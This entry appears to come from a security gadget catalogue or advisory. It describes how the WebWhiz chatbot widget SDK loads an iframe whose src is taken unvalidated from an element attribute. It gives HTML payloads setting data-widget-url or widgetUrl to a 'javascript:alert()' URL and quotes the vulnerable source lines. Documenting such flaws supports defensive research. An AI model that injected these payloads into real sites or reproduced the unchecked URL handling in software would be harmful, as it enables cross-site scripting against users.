WebWhiz allows you to create an AI chatbot that knows everything about your product and can instantly respond to your customer’s queries.
The WebWhiz library allows to load a widget <iframe> with a controlled src using the data-widget-url attribute.
<!-- user input -->
<x id="__webwhizSdk__" data-widget-url="javascript:alert()//"></x>
<!-- after version 1.0.0, WebWhiz must be installed using npm install -->Root Cause
Source: https://github.com/webwhiz-ai/webwhiz/blob/2.0.0-beta.5/widget/webwhiz-sdk.js#L267
function __WEBWHIZ__getWidgetURL() {
const scriptEl = document.getElementById("__webwhizSdk__");
const baseURL = scriptEl.getAttribute('widgetUrl') || scriptEl.getAttribute('data-widget-url');
return baseURL || 'https://widget.webwhiz.ai/';
}
Source: https://github.com/webwhiz-ai/webwhiz/blob/2.0.0-beta.5/widget/webwhiz-sdk.js#L152
var __WEBWHIZ__URL = __WEBWHIZ__getWidgetURL();
// [...]
ifrm.setAttribute("src", __WEBWHIZ__URL + '?kbId=' + kbId +'&baseUrl=' + baseUrl);
Found by @kevin_mizu.
The WebWhiz library was allowing to load a widget <iframe> with a controlled src using the widgetUrl attribute.
<!-- user input -->
<x id="__webwhizSdk__" widgetUrl="javascript:alert(document.domain)//"></x>
<script src="https://www.unpkg.com/[email protected]/dist/sdk.js"></script>Root Cause
var e=function(){let e=document.getElementById("__webwhizSdk__").getAttribute("widgetUrl");return e||"https://widget.webwhiz.ai/"}();
// [...]
i=document.createElement("iframe");
// [...]
i.setAttribute("src",e+"?kbId="+a+"&baseUrl="+s)})
Found by @kevin_mizu.